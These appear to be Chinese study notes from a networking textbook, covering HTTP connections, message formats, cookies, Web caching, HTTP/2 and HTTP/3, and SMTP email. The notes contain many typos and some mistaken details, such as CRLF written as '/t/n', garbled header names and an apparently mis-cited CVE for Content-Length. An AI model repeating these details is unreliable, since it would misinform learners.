为了深入地理解该设计问题,我们研究在特定的应用程序即HTTP的情况下持续连接的优点和缺点,HTTP既能够使用非持续连接,也能够使用持续连接。尽管HTTP默认使用持续连接,但HITP客户和服务器也能配置成使用非持续连接。

1. 采用非持续连接的HTTP

我们看看在非持续连接情况下从服务器向客户传送一个Web页面的步骤。假设该页面含有1个HTML基本文件和10个JPEG图形,并且这11个对象位于同一台服务器上。进一步假设该HTML文件的URL为http://www.example.com/index.html，以下是请求发送的情况：

HTTP客户进程在端口号80发起一个到服务器www.example.com的TCP连接,该端口号是HTTP的默认端口。在客户和服务器上分别有一个套接字与该连接相关联。
HTTP客户经它的套接字向该服务器发送一个HTTP请求报文。请求报文中包含了路径名/index.html。
HTTP服务器进程经它的套接字接收该请求报文,从其存储器(通常是RAM)中检索出对象index.html(注意工作目录问题),在一个HTTP响应报文中封装对象,并通过其套接字向客户发送响应报文。
HTTP服务器进程通知TCP断开该TCP连接。(但直到TCP确认客户得到完整的响应报文后,它才会实际中断连接。)
HTTP客户接收响应报文,TCP连接关闭。该报文指出封装的对象是一个HTML文件,客户从响应报文中提取出该文件,检查该HTML文件,得到对10个JPEG图形的引用。
对每个引用的JPEG图形对象重复前4个步骤。

当浏览器收到Web页面后,向用户显示该页面。两个不同的浏览器也许会以不同的方式解释（即向用户显示)该页面。HTTP与客户如何解释一个Web页面毫无关系。HTTP规范([RFC1945]和[RFC7540])仅定义了在HTTP客户程序与HTTP服务器程序之间的通信协议。

上面的步骤举例说明了非持续连接的使用,其中每个TCP连接在服务器发送一个对象后关闭,即该连接并不为其他的对象而持续下来。HTTP71.0应用了非持续TCP连接。值得注意的是每个TCP连接只传输一个请求报文和一个响应报文。因此在本例,当用户请求该Web页面时,要产生11个TCP连接。

在上面描述的步骤,我们有意没有明确客户获得这10个JPEG图形对象是使用10个串行的TCP连接,还是某些JPEG对象使用了一些并行的TCP连接。事实上,用户能够配置现代浏览器来控制连接的并行度。浏览器打开多个TCP连接,并且请求经多个连接请求某Web页面的不同部分。我们在下一章会看到,使用并行连接可以缩短响应时间。

在继续讨论之前,我们来简单估算一下从客户请求HTML基本文件起到该客户收到整个文件止所花费的时间。为此,我们给出往返时间(Round-TripTime,RTT)的定义,该时间是指一个短分组从客户到服务器然后再返回客户所花费的时间。RTT包括分组传播时延、分组在中间路由器和交换机上的排队时延以及分组处理时延。现在考虑当用户点击超链接时会发生什么现象。如下图所示,,这引起浏览器在它和Web服务器之间发起一个TCP连接;这涉及一次“三次握手”过程,即客户向服务器发送一个小TCP报文段,服务器用一个小TCP报文段做出确认和响应,最后,客户向服务器返回确认(确认连接建立)。三次握手中前两个部分所耗费的时间占一个RTT。完成了三次握手的前两个部分后，客户结合三次握手的第三部分向该TCP连接发送一个HTTP请求报文。一旦该请求报文到达服务器，服务器就在该TCP连接上发送HTML文件。该HTTP请求/响应用去了另一个RTT。因此,粗略地讲,总的响应时间就是两个RTT加上服务器传输HTML文件的时间。

非持续性连接的缺点非常明显。第一，必须为每一个请求的对象建立和维护一个全新的连接。对于每个这样的连接,在客户和服务器中都要分配TCP的缓冲区和保持TCP变量，这给Web服务器带来了严重的负担，因为一台Web服务器可能同时服务于数以百计不同客户的请求。第二,每一个对象经受两倍RTT的交付时延,即一个RTT用于创建TCP,另一个RTT用于请求和接收一个对象。

2. 采用持续连接的HTTP

在采用HTTP1.1持续连接的情况,服务器在发送响应后保持该TCP连接打开。在相同的客户与服务器之,后续的请求和响应报文能够通过相同的连接进行传送。特别是,一个完整的Web页面(上例中的HTML基本文件加上10个图形)可以用单个持续TCP连接进行传送。更有甚者,位于同一台服务器的多个Web页面在从该服务器发送给同一个客户时,可以在单个持续TCP连接上进行。对对象的这些请求可以一个接一个地发出,而不必等待对未决请求(流水线)的回答。通常,如果一条连接经过一定时间间隔(一个可配置的超时间隔)仍未被使用,HTTP服务器就关闭该连接。HTTP的默认模式是使用带流水线的持续连接。

#HTTP 报文格式

HTTP规范[RFC1945,RFC7230,RFC7540]包含了对HTTP报文格式的定义。HTTP报文有两种:请求报文和响应报文。下面讨论这两种报文。

1. HTTP请求报文

下面提供了一个典型的HTTP请求报文：

 GET /soemedir/page.htmL HTTIP/1.1 Host: www.Someschool.edu Connection: Close User-agent: Mozilla/5.0 Accept-Language: fr

通过仔细观察这个简单的请求报文,我们就能学到很多东西。首先,我们看到该报文是用普通的ASCII文本书写的,这样有一定计算机知识的人都能够阅读它。其次,我们看到该报文由5行组成,每行由一个回车和换行符(/t/n)结束。最后一行后再附加一个回车和换行符。虽然这个特定的报文仅有5行,但一个请求报文能够具有更多的行或者至少为一行。

HTTP请求报文的第一行叫作请求行(requestline),其后继的行叫作首部行(headerline)。请求行有3个字段:方法字段、URL字段和HTTP版本字段。方法字段可以取几种不同的值,包括GET、POST、HEAD、PUT和DELETE。绝大部分的HTTP请求报文使用GET方法。当浏览器请求一个对象时,使用GET方法,在URL字段带有请求对象的标识。在本例中,该HTTP报文在请求对象/somedirpage.html。其版本字段是自解释的,在本例中,浏览器实现的是HTTP/1.1版本。

现在我们看看本例的首部行。首部行Host:www.someschool.edu指明了的主机。你也许认为该首部行是不必要的,因为在该主机中已对象所在经有一条TCP连接存在了。但是,如我们将在2.2.5节中所见,该首部行提供的信息是Web代理高速缓存所要求的。通过包含Connection:close首部行,该浏览吉告诉服务器不要麻烦地使用持续连接,它要求服务吉在发送完被请求的对象后就关闭这条连接。User-agent:首部行用来指明用户代理,即向服务器发送请求的浏览器的类型。这里浏览器类型是Mozila/5.0,即Firefox浏览器。这个首部行是有用的,因为服务器可以有效地为不同类型的用户代理实际发送相同对象的不同版本(每个版本都由相同的URL寻址)。最后,Accept-language:首部行表示用户想得到该对象的法语版本(如果服务器中有这样的对象的话);否则,服务器应当发送它的默认版本。Accept-language:首部行仅是HTTP中可用的众多内容协商首部之一。

看过一个例子之后,我们再来看看如下图所示的一个请求报文的通用格式。我们看到该通用格式与我们前面的例子密切对应。然而,在首部行(与附加的回车和换行符)后有一个实体体(entitybody)。使用GET方法时整个实体体为空,而使用POST方法(并不止)时才使用该实体体。当用户提交表单时,HTTP客户常常使用POST方法,例如当用户向搜索引擎提供搜索关键词时。使用POST报文时,用户仍可以向服务器请求一个Web页面,但Web页面的特定内容依赖于用户在表单字段中输入的内容。如果方法字段的值为POST,则实体体中包含的就与用户在表单字段中的输入值有关。

HTML表单将是经常使用GET方法,并在(表单字段)所请求的URL中包括输入的数据。例如,一个表单使用GET方法,它有两个字段,分别填写的是monkeys和bananas这样,该URL结构为www.somesite.com/animalsearch?monkeys&bananas。

这里的monkey和bananas就是GET Params。

HEAD方法类似于GET方法。当服务器收到一个使用HEAD方法的请求时,将会用一个HTTP报文进行响应,但是并不返回请求对象。应用程序开发者常用HEAD方法进行调试跟踪。
PUT方法常与Web发行工具联合使用,它允许用户上传对象到指定的Web服务需上指定的路径(目录)。PUT方法也被那些需要向Web服务器上传对象的应用程序使用。
DELETE方法允许用户或者应用程序删除Web服务器上的对象。

2.HTTP响应报文

下面提供了一条典型的HTTP响应报文。该响应报文可以是对刚刚讨论的例子中请求报文的响应。

HTTP/1.1 200 OKConriection: closeDate: Tue, 18 Aug 2015 15:44:04 GMTServer: Apache/2.2.3 (CentOS)Last-Modified: Tue, 18 Aug 2015 15:11:03 GMTContent-Length: 6821Content-Type: text/html(data ...)

仔细看一下这个响应报文。它有三个部:一个初始状态行(status line),6个首部行(header line),然后是实体体(entity body)。实体体部分是报文的主要部分,即它包含了所请求的对象本身(表示为data…)。

状态行有3个字段:协议版本字段、状态码和响应状态信息。在这个例子中,状态行指示服务器正在使用HTTP/1.1,并且一切正常（状态码200，即服务器已经找到并正在发送所请求的对象)。

现在来看看首部行。

Connection: close首部行告诉客户,发送完报文后将关闭该TCP连接。
Date首部行指示服务器产生并发送该响应报文的日期和时间。值得一提的是,这个时间不是指对象创建或者最后修改的时间,而是服务器从它的文件系统中检索到该对像,将该对象插入响应报文,并发送该响应报文的时间。
Server首部行指示该报文是由一台Apache Web服务器产生的,它类似于HTTP请求报文中的User-agent首部行。
Last-Modiftied首部行指示该对象创建或最后修改的时间与日期。“Last-Modified首部行对既可能在本地客户也可能在网络缓存服务器(即代理服务器)上的对象缓存来说非常重要,下文将更为详细地讨论Last-Modified首部行。
Content-Length首部行指示了被发送对象中的字节数。Content-Type首部行指示了实体体中的对象是HTML文本。(该对象类型应该正式地用Content-Type首部行而不是文件扩展名来指示。)
Content-Length也是可以引发安全问题的，比如CVE-2024-21096。

一些常见的状态码和相关的短语包括:

200 OK:请求成功,信息在返回的响应报文中。
301 Moved Permanently:请求的对象已经被永久转移了,新的URL定义在响应报文的Location首部行。客户软件将自动获取新的URL。
400 Bad Request: 一个通用差错代码,指示该请求不能被服务器理解。
403 Forbidden: 拒绝访问(无权限访问或不合规范等)。
404 Not Found: 被请求的文档不在服务器上。
500 Internal Server Error: 服务器内部错误。
505 HTTP Version Not Supported: 服务器不支持请求报文使用的HTTP版本。

在本节中,我们讨论了HTTP请求报文和响应报文中的一些首部行。HTTP规范中定义了许许多多的首部行,这些首部行可以被浏览器、Web服务器和网络缓存服务器插入(当然也可以自己来加)。我们只提到了全部首部行中的少数几个,在2.2.5节中我们讨论网络Web缓存时还会涉及其他几个。

浏览器是如何决定在一个请求报文中包含哪些首部行的呢?Web服务器又是如何决定在一个响应报文中包含哪些首部行呢?浏览器产生的首部行与很多因素有关,包括浏览器的类型和版本、浏览器的用户配置、浏览器当前是否有一个缓存的但可能超期的对象版本。Web服务器的表现也类似:在产品、版本和配置上都有差异,所有这些都会影响响应报文中包含的首部行。

我们前面提到了HTTP服务器是无状态的。这简化了服务器的设计,并且允许工程师开发可以同时处理数千个TCP连接的高性能Web服务器。然而一个Web站点通常希望能够识别用户,可能是因为服务器希望限制用户的访问,或者因为它希望把内容与用户身份联系起来。为此,HTTP使用了Cookie。Cookie在[RFC 6265]中定义,它允许用户进行跟踪。目前大多数商务Web站点都使用了Cookie。

如下图所示,Cookie技术有4个组件:

在HTTP响应报文中的一个Cookie首部行;
在HTTP请求报文中的一个Cookie首部行;
在用户端系统中保留的一个Cookie文件,并由用户的浏览器进行管理；
位于Web站点的一个后端数据库。

这里省去一个例子。

Cookie可以用于标识一个用户。用户首次访问一个站点时,可能需要提供一个用户标识(可能是名字[实际上会是根据某个密钥加一些个人信息加密生成的])。在后继会话中,浏览器向服务器传递一个Cookie首部,从而向该服务器标识了用户。因此Cookie可以在无状态的HTTP之上建立一个用户会话层。例如，当用户向一个基于Web的电子邮件系统注册时,浏览需向服务器发送Cookie信息,允许该服务器在用户与应用程序会话的过程标识该用户。

尽管Cookie通常能够简化用户的因特网购物活动,但是其使用仍具有争议,因为它被认为是对用户隐私的一种侵害。如我们刚才所见,结合Cookie和用户提供的账户信息,Web站点可以得知许多有关用户的信息,并可能将这些信息卖给第三方。

所以现在很多站点会询问是否允许记录Cookie。

#Web缓存

Web缓存器(Web cache)也叫代理服务器(proxy server),它是能够代表初始Web服务器来满足HTTP请求的网络实体。Web缓存器有自己的磁盘存储空间,并在存储空间中保存最近请求过的对象的副本。如下图所示,可以配置用户的浏览器,使得用户的所有HTTP请求首先指向Web缓存器[RFC 7234]。一且某浏览器被配置,每个对某对象的浏览器请求首先被定向到该Web缓存器。举例来说,假设浏览器正在请求对象http:www.someschool.edu/campus.gif,将会发生如下情况:

浏览器创建一个到Web缓存器的TCP连接,并向Web缓存HTTP请求。
Web缓存器进行检查,看看本地是否存储了该对象副本。如果有,Web绥存器就向客户浏览器用HTTP响应报文返回该对象。
如果Web绥存器中没有该对象,它就打开一个与该对象的初始服务器(即www.someschool.edu)的TCP连接。Web缓存器则在这个缓存器到服务器的TCP连接上发送一个对该对象的HTTP请求。在收到该请求后,初始服务器向该Web缓存器发送具有该对象的HTTP响应。
当Web缓存器接收到该对象时,它在本地存储空间存储一份副本,并向客户的浏览器用HTTP响应报文发送该副本(通过客户浏览器和Web缓存器之间现有的TCP连接)。

值得注意的是Web缓存器既是服务器又是客户。当它接收浏览器的请求并发回响应时,它是一个服务器。当它向初始服务器发出请求并接收响应时,它是一个客户。

在因特网上部署Web绥存器有两个原因。首先,Web缓存器可以大大减少对客户请求的响应时间,特别是当客户与初始服务器之间的瓶颈带宽远低于客户与Web缓存器之间的瓶颈带宽时更是如此。如果在客户与Web缓存器之间有一个高速连接(情况常常如此),并且如果用户所请求的对象在Web缓存器上,则Web缓存器可以迅速将该对象交付给用户。其次,如我们马上用例子说明的那样,Web缓存器能够大大减少一个机构的接入链路到因特网的通信量。通过减少通信量,该机构(如一家公司或者一所大学)就不必急于增加带宽,因此降低了费用。此外,Web缓存器能从整体上大大减少因特网上的Web流量,从而改善了所有应用的性能。

为了深刻理解缓存器带来的好处,我们考虑在下图场景下的一个例子。该图显示了两个网络,即机构(内部)网络和公共因特网的一部分。机构网络是一个高速的局域网,它的一台路由器与因特网上的一台路由器通过一条15Mbps的链路连接。这些初始服务器与因特网相连但位于全世界各地。假设对象的平均长度为1Mb,从机构内的浏览器对这些初始服务器的平均访问速率为每秒15个请求。假设HTTP请求报文小到可以忽略,因而不会在网络中以及接入链路(从机构内部路由器到因特网路由器)上产生什么通信量。我们还假设在图中从因特网接入链路一侧的路由器转发HTTP请求报文(在一个IP数据报中)开始,到它收到其响应报文(通常在多个IP数据报中)为止的时间平均为2s。我们将该持续时延非正式地称为“因特网时延”。

总的响应时间,即从浏览器请求一个对象到接收到该对象为止的时间,是局域网时延、接入时延(即两台路由器之间的时延)和因特网时延之和。我们来粗略地估算一下这个时延,局域网上的流量强度为:

(15个请求/s)x(1Mb/请求)/(100Mbps)=0.15

然而接入链路上的流量强度(从因特网路由器到机构路由器)为

(15个请求/s)x(1Mb/请求)/(15Mbps)=1

局域网上强度为0.15的通信量通常最多导致数十毫秒的时延,因此我们可以忽略局域网时延。然而,如在1.4.2节讨论的那样,如果流量强度接近1(就像图中接入链路的情况那样),链路上的时延会变得非常大并且无限增长。因此,满足请求的平均响应时间将在分钟的量级上。显然,必须想办法来改进时间响应特性。

一个可能的解决办法就是增加接入链路的速率,如从15Mbps增加到100Mbps。这可以将接入链路上的流量强度减少到0.15,这样一来,两台路由器之间的链路时延也可以忽略了。这时,总的响应时间将大约为2s,即为因特网时延。但这种解决方案也意味着该机构必须将它的接入链路由15Mbps升级为100Mbps,这是一种代价很高的方案(很贵的)。

现在来考虑另一种解决方案,即不升级链路带宽而是在机构网络中安装一个Web缓存器。这种解决方案如图2-13所示。现实中的命中率(即由一个缓存器所满足的请求的比率)通常在0.2~0.7之间。为了便于阐述,我们假设该机构的缓存命中率为0.4。因为客户和缓存连接在一个相同的高速局域网上,这样40%的请求将几乎立即会由缓存器得到响应,时延约在10ms以内。然而,剩下的60%的请求仍然要由初始服务器来满足。但是只有60%的被请求对象通过接入链路,接人链路上的流量强度从1.0减小到0.6。一般而言在15Mbps链路上,当流量强度小于0.8时对应的时延较小,约为几十毫秒。这个时延与2s因特网时延相比是微不足道的。

因此,第二种解决方案提供的响应时延甚至比第一种解决方案更低,也不需要该机构升级它到因特网的链路。该机构理所当然地要购买和安装Web缓存器。除此之外其成本较低,很多缓存器使用了运行在廉价PC上的公共域软件。

通过使用内容分发网络(Content Distribution Network,CDN),Web缓存器正在因特网中发挥着越来越重要的作用。CDN公司在因特网上安装了许多地理上分散的缓存器,因而使大量流量实现了本地化。有多个共享的CDN(例如Akamai和Limelight)和专用的CDN(例如谷歌和Netflix)。

条件GET方法

尽管高速缓存能减少用户感受到的响应时间,但也引入了一个新的问题,即存放在缓存器中的对象副本可能是陈旧的。换名话说,保存在服务器中的对象自该副本缓存在客户上以后可能已经被修改了。幸运的是,HTTP有一种机制,允许缓存器证实它的对象是最新的。这种机制就是条件GET(conditional GET)[RFC7232]。如果HTTP请求报文使用GET方法,并且请求报文中包含一个If-modified-since首部行,那么,这个HTTP请求报文就是一个条件GET请求报文。

为了说明GET方法的操作方式,我们看一个例子。首先,一个代理缓存器(proxy cache)代表一个请求浏览器,向某Web服务器发送一个请求报文:

GET /fruit/kiwi.gif HTTP/1.1Host: www.exotiquecuisine.com

其次,该Web服务器向缓存器发送具有被请求的对象的响应报文:

HTTP/1.1 200 OKDate: Sat, 3 Oct 2015 15:39:29Server: Apache/1.3.0 (Unix)Last-Modified: Wed,9 Sep 2015 09:23:24Content-Type: image/gif(data...)

该缓存器在将对象转发到请求的浏览器的同时,也在本地缓存了该对象。重要的是,缓存器在存储该对象时也存储了最后修改日期。最后,一个星期后,另一个用户经过该缓存器请求同一个对象,该对象仍在这个缓存器中。由于在过去的一个星期中位于Web服务器上的该对象可能已经被修改了,该缓存器通过发送一个条件GET执行最新检查。具体来说,该缓存器发送:

 GET /fruit/kiwi.gif HTTP/1.1 Host: www.exotiquecuisine,com If-modified-since: Wed, 9 Sep 2015 09:23:24

值得注意的是If-modified-since首部行的值正好等于一星期前服务器发送的响应报文中的Last-Modified首部行的值。该条件GET报文告诉服务器,仅当自指定日期之后该对象被修改过,才发送该对象。假设该对象自2015年9月9日09:23:24后没有被修改。接下来的第四步,Web服务器向该缓存器发送一个响应报文:

 HTTP/1.1 304 Not Modified Date: Sat, 10 Oct 2015 15:39:29 Server: Apache/1.3.0 (Unix)  (empty entity body)

我们看到,作为对条件CET方法的响应,该Web服务器仍发送一个响应报文,但并没有在该响应报文中包含所请求的对象。包含该对象只会浪费带宽,并增加用户感受到的响应时间,特别是如果该对象很大更是如此。值得注意的是在最后的响应报文中,状态行中为304 Not Modified,它告诉缓存器可以使用该对象,能向请求的浏览器转发它(该代理缓存器)缓存的对象副本。

#HTTP/2

于2015年标准化的HTTP/2[RFC 7540]是自HTTP/1.1以后的首个新版本,而HTTP/1.1是1997年标准化的。HTTP/2公布后,2020年,在排名前1000万的Web站点中,超过40%的站点支持HTTP/2。大多数浏览器(包括Chrome、Internet Explorer、Safari、0pera和Firefox)也支持HITP/2。

HTTP/2的主要目标是减小感知时延,其手段是经单一TCP连接使请求与响应多路复用,提供请求优先次序和服务推送,并提供HTTP首部字段的有效压缩。HTTP/2不改变HTTP方法、状态码、URL或首部字段,而是改变数据格式化方法以及客户和服务器之间的传输方式。

回想HTTP/1.1,其使用持续TCP连接,允许经单一TCP连接将一个Web页面从服务器发送到客户。由于每个Web页面仅用一个TCP连接,服务器的套接字数量被压缩,并且所传送的每个Web页面平等共享网络带宽(如下面所讨论的)。但Web浏览器的开发者很快就发现了经单一TCP连接发送一个Web页面中的所有对象存在队首阻塞[Head Of Line (HOL) blocking]问题。

为了理解HOL阻塞,考虑一个Web页面,它包括一个HTML基本页面、靠近Web页面顶部的一个大视频片段和该视频下面的许多小对象。进一步假定在服务器和客户之间的通路上有一条低速/中速的瓶颈链路(例如一条低速的无线链路)。使用一条TCP连接,视频片段将花费很长时间来通过该瓶颈链路,与此同时,那些小对象将被延迟,因为它们在视频片段之后等待。也就是说,链路前面的视频片段阻塞了后面的小对象。HTTP/1.1浏览器解决该问题的典型方法是打开多个并行的TCP连接,从而让同一Web页面的多个对象并行地发送给浏览器。采用这种方法,小对象到达并呈现在浏览器上的速度要快得多,因此可减小用户感知时延。

TCP拥塞控制(将在第3章中详细讨论)也使得浏览器倾向于使用多条并行TCP连接而非单一持续连接。粗略来说,TCP拥塞控制针对每条共享同一条瓶颈链路的TCP连接,给出一个平等共享该链路的可用带宽。如果有n条TCP连接运行在同一条瓶颈链路上,则每条连接大约得到1/n带宽。通过打开多条并行TCP连接来传送一个Web页面,浏览器能够”欺骗”并霸占该链路的大部分人带宽。许多HTTP/1.1打开多达6条并行TCP连接并非为了避免HOL阻塞,而是为了获得更多的带宽。

HTTP/2的基本目标之一是摆脱(或至少减少其数量)传送单一Web页面时的并行TCP连接。这不仅减少了需要服务器打开与维护的套接字数量,而且允许TCP拥塞控制像设计的那样运行。但与只用一个TCP连接来传送一个Web页面相比,HTTP/2要求仔细设计相关机制以避免HOL阻塞。

1. HTTP/2 成帧

用于HOL阻塞的HTTP/2解决方案是将每个报文分成小帧,并且在相同TCP连接上交错发送请求和响应报文。为了理解这个问题,再次考虑由一个大视频片段和许多小对象(例如8个)组成的Web页面的例子。此时,服务器将从希望查看该Web页面的浏览器处接收到9个并行的请求。对于每个请求,服务器需要向浏览器发送9个相互竞争的报文。假定所有帧具有固定长度,该视频片段由1000帧(报文帧)组成,并且每个较小的对象由2帧组成。使用帧交错技术,在视频片段发送第一帧后,发送每个小对象的第一帧。然后在视频片段发送第二帧后,发送每个小对象的第二帧。因此,在发送视频片段的18帧后,所有小对象就发送完成了。如果不采用交错,则发送完其他小对象共需要发送1016帧。因此HTTP/2成帧机制能够极大地减小用户感知时延。

将一个HTTP报文分成独立的帧、交错发送它们并在接收端将其装配起来的能力,是HTTP/2最为重要的改进。这一成帧过程是通过HTTP/2协议的成帧子层来完成的。当某服务器要发送一个HTTP响应,其响应由成帧子层来处理,即将响应划分为帧。响应的首部字段成为一帧,报文体被划分为一帧以用于更多的附加帧。通过服务器中的成帧子层,该响应的帧与其他响应的帧交错并经过单一持续TCP连接发送。当这些帧到达客户时,它们先在成帧子层装配成初始的响应报文,然后像以往一样由浏览器处理。类似地,客户的HTTP请求也被划分成帧并交错发送。

除了将每个HTTP报文划分为独立的帧外,成帧子层也对这些帧进行二进制编码。二进制协议解析更为高效,会得到略小一些的帧,并且更不容易出错。

2. 响应报文的优先次序和服务器推(推送)

报文优先次序允许研发者根据用户要求安排请求的相对优先权,从而更好地优化应用的性能。如前文所述,成帧子层将报文组织为并行数据流发入相同的请求方。当某客户向服务器发送并发请求时,它能够为正在请求的响应确定优先次序,方法是为每个报文分配1到256之间的权重。较大的数字表明较高的优先。通过这些权重,服务器能够为具有最高优先权的响应发送第一帧。此外,客户也可通过指明相关的报文段ID,来说明每个报文段与其他报文段的相关性。

HTTP/2的另一个特征是允许服务器为一个客户请求而发送多个响应。即除了对初始请求的啊应外,服务器能够向该客户推额外的对象,而无须客户再进行任何请求。因为HTML基本页指示了需要在页面呈现的全部对象,所以这一点是可实现的。因此无须等待对这些对象的HTTP请求,服务器就能够分析该HTML页,识别需要的对象,并在接收到对这些对象的明确的请求前将它们发送到客户。服务器推消除了因等待这些请求而产生的额外时延。

HTTP/3

QUIC(在第3章讨论)是一种新型的“运输”协议，它在应用层中最基本的UDP之上实现。QUIC具有几个能够满足HTTP的特征,例如报文复用(交错)、每流流控和低时延连接创建。HTTP/3是一种设计在QUIC之上运行的新HTTP。到2020年为止,HTTP/3处于因特网草案阶段,还没有全面标准化。许多HTTP/2特征(如报文交错)已被收入QUIC中,使得对HTTP/3的设计更为简单合理。

#因特网中的电子邮件

自从有了因特网，电子邮件就在因特网上流行起来。当因特网还在襁褓之中时，电子邮件已经成为最流行的应用程序，年复一年，它变得越来越精细，越来越强大。它仍然是当今因特网上最重要和实用的应用程序之一。

与普通邮件一样，电子邮件是一种异步通信媒介，即人们方便时就可以发送邮件，不必与他人的计划进行协调。与普通邮件相比，电子邮件更为快速，易于分发，而且价格便宜。现代电子邮件具有许多强大的功能，包括添加附件，超链接，HTML格式文本和图片。

在本节中，我们将讨论于因特网电子邮件核心地位的应用层协议。在深入讨论这些应用层协议之前，我们先总体看看因特网电子邮件系统和他的关键组件。

图2-14给出了因特网电子邮件系统的总体情况。从该图中，我们可以看到它有3个主要组成部分：用户代理(user agent)、邮件服务器(mail server)和简单邮件传输协议〈Simple Mail Transfer Protocol,SMTP)。下面我们结合发送方Alice发电子邮件给接收方Bob的场景，对每个组成部分进行描述。用户代理允许用户阅读，恢复，转发，保存和撰写报文。微软的Outlook、Apple Mail、基于Web的Gmail和运行在智能手机上的Gmail客户端等都是电子邮件用户代理。当Alice完成邮件撰写时,她的邮件代理向其邮件服务器发送邮件,此时邮件放在邮件服务器的外出报文队列。当Bob要阅读代理在其邮件服务器的邮箱中取得该报文。

邮件服务器形成了电子邮件体系结构的核心。每个接收方(如Bob)在其中的某个邮件服务器上有一个邮箱(mail box)。Bob的邮箱管理和维护着发送给他的报文。一个典型的邮件发送过程是:从发送方的用户代理开始,传输到发送方的邮件服务器,再传输到接收方的邮件服务器,然后在这里被分发到接收方的邮箱中。当Bob要在他的邮箱中读取该报文时,包含他邮箱的邮件服务器(使用用户名和口令)鉴别其身份。Alice的邮箱也必须能处理Bob的邮件服务器的故障。如果Alice的服务器不能将邮件交付给Bob的服务器(比如Bob的邮件服务器发生了故障),Alice的邮件服务器在一个报文队列(message queue)中保持该报文并在以后尝试再次发送。通常每30分钟左右进行一次和尝试,如果几天后仍不能成功,服务器就删除该报文并以电子邮件的形式通知发送方(Alice)。

SMTP是因特网电子邮件中主要的应用层协议。它使用TCP可靠数据传输服务,从发送方的邮件服务器向接收方的邮件服务器发送邮件。像大多数应用层协议一样,SMTP也有两个部分:运行在发送方邮件服务器的客户端和运行在接收方邮件服务器的服务器端。每台邮件服务器上既运行SMTP的客户端也运行SMTP的服务器端。当一个邮件其他邮件服务器发送邮件时,它服务器向就表现为SMTP的客户;当一个邮件服务器从其他邮件服务器上接收邮件时,它就表现为SMTP的服务器。

#SMTP

RFC 5321给出了SMTP的定义。SMTP是因特网电子邮件的核心。如前所述,SMTP用于从发送方的邮件服务器发送报文到接收方的邮件服务器。SMTP问世的时间比HTTP要长得多(初始的SMTP的RFC可追溯到1982年,而SMTP在此之前很长一段时间就已经出现了)。尽管电子邮件应用在因特网上的独特地位可以证明SMTP有着众多非常出色的性质,但它所具有的某种陈旧特征表明它仍然是一种继承的技术。例如,它限制所有邮件报文的体部分(不只是其首部)只能采用简单的7比特ASCII表示。在20世纪80年代早期,这种限制是明智的,因为当时传输能力不足,没有人会通过电子邮件发送大的附件或大的图片、声音、视频文件然而,在今天的多媒体时代,7比特ASCII的限制的确有点痛苦,即在用SMTP传送邮件之前,需要将二进制多媒体数据编码为ASCI码,并且在使用SMTP传输后要求将相应的ASCII码邮件解码还原为多媒体数据。2.2节讲过,使用HTTP传送前不需要将多媒体数据编码为ASCI码。

为了描述SMTP的基本操作,我们观察一种常见的情景。假设Alice想给Bob发送一封简单的ASCII报文。

Alice调用她的邮件代理程序并提供Bob的邮件地址(例如bob@someschool.edu)，撰写报文,然后指示用户代理发送该报文。
Alice的用户代理把报文发到她的邮件服务器,在那里该报文被放在报文队列中。
运行在Alice的邮件服务器上的SMTP客户发现了报文队列中的这个报文,它创建一个到运行在Bob的邮件服务器上的SMTP服务器的TCP连接。
在经过一些初始SMTP握手后,SMTP客户通过该TCP连接发送Alice的报文。
在Bob的邮件服务器上,SMTP的服务器接收该报文。Bob的邮件服务器然后将该报文放入Bob的邮箱中。
在Bob方便的时候,他调用用户代理阅读该报文。

需要注意，SMTP一般不使用中间邮件服务器发送邮件,即使这两个邮件服务器位于地球的两端也是这样。假设Alice的邮件服务器在中国香港,而Bob的服务器在美国圣路易斯,那么这个TCP连接也是从香港服务器到圣路易斯服务器之间的直接相连。特别是,如果Bob的邮件服务器没有开机,该报文会保留在Alice的邮件服务器上并等待进行新的尝试,这意味着邮件并不在中间的某个邮件服务器中存留。

我们现在仔细观察一下,SMTP是如何将一个报文从发送邮件服务器传送到接收邮件服务器的。首先,客户端SMTP(运行在发送邮件服务器主机上)在25号端口建立一个到服务器SMTP(运行在接收邮件服务器主机上)的TCP连接。如果服务器没有开机,客户端SMTP服务会在稍后继续尝试连接。一旦连接建立,服务器和客户执行某些应用层的握手(就像人们在相互交流前先进行自我介绍一样)。SMTP的客户和服务器在传输信息前先相互介绍。在SMTP握手的阶段,客户端SMTP指示发送方的邮件地址和接收方的邮件地址。一旦该SMTP客户和服务器彼此介绍之后,客户端SMTP服务发送该报文。SMTP能依赖TCP提供的可靠数据传输无差错地将邮件投递到接收服务器。该客户如果有另外的报文要发送到该服务器,就在该相同的TCP连接上重复这种处;否则,它指示TCP关闭连接。

接下来我们分析一个在SMTP客户端(C)和SMTP服务器(S)之间交换报文文本的例子。客户的主机名为crepes.fs,服务器的主机名为hamburger.edu。以C:开头的ASCII码文本行正是客户交给其TCP套接字的那些行,以S:开头的ASCII码文本则是服务器发送给其TCP套接字的那些行。一旦创建了TCP连接，就开始下列过程：

S:  220 hamburger.eduC:  HELO crepes.frS:  250 Hello crepes.fr,Pleased to meet YoUC:  MAIL FROM:S:  250 alice@crepes.fr ... Sender okC:  RCPT TO: S:  250 bob@hamburger.edu...Recipient okC:  DATAS:  354 Enter mail,end with "." on a line by itselfC:  DO you like ketchup?S:  How about Pickles?C:  .S:  250 Message accepted for deliveryC:  QUITS:  221 hamburger.edua closing connection

在上例中,客户从邮件服务器crepes.fr在向邮件服务器hamburger.edu发送了一个报文(Do you like ketchup?How about pickles?)。作为对话的一部分,该客户发送了5条命令:HELO(是HELLO的缩写)、MAILFROM、RCPTTO、DATA以及QUIT。这些命令都是自解释的。该客户通过发送一个只包含一个句点的行,向服务器指示该报文结束了。(按照ASCII码的表示方法,每个报文以CRLF.CRLF结束,其中的CR和IF分别表示回车和换行。)服务器对每条命令做出回答,其中每个回答含有一个回答码和一些(可选的)英文解释。我们在这里指出SMTP用的是持续连接:如果发送邮件服务器有几个报文发往同一个接收邮件服务器,它可以通过同一个TCP连接发送所有这些报文。对每个报文,该客户用一个新的MAIL FROM:crepes.re开始,用一个独立的句点指示该邮件的结束,并且仅当所有邮件发送完后才发送QUIT。

我们强烈推荐你使用Telnet与一个SMTP服务器进行一次直接对话。使用的命令是telnet ServerName 25其中serverName是本地邮件服务器的名称。当你这么做时,就直接在本地主机与邮件服务器之间建立了一个TCP连接。输完上述命令后,你立即会从该服务器收到220回答。接下来,在适当的时机发出HELO、MAIL FROM、RCPT TO、DATA、CRLF.CRLF以及QUIT等SMTP命令。

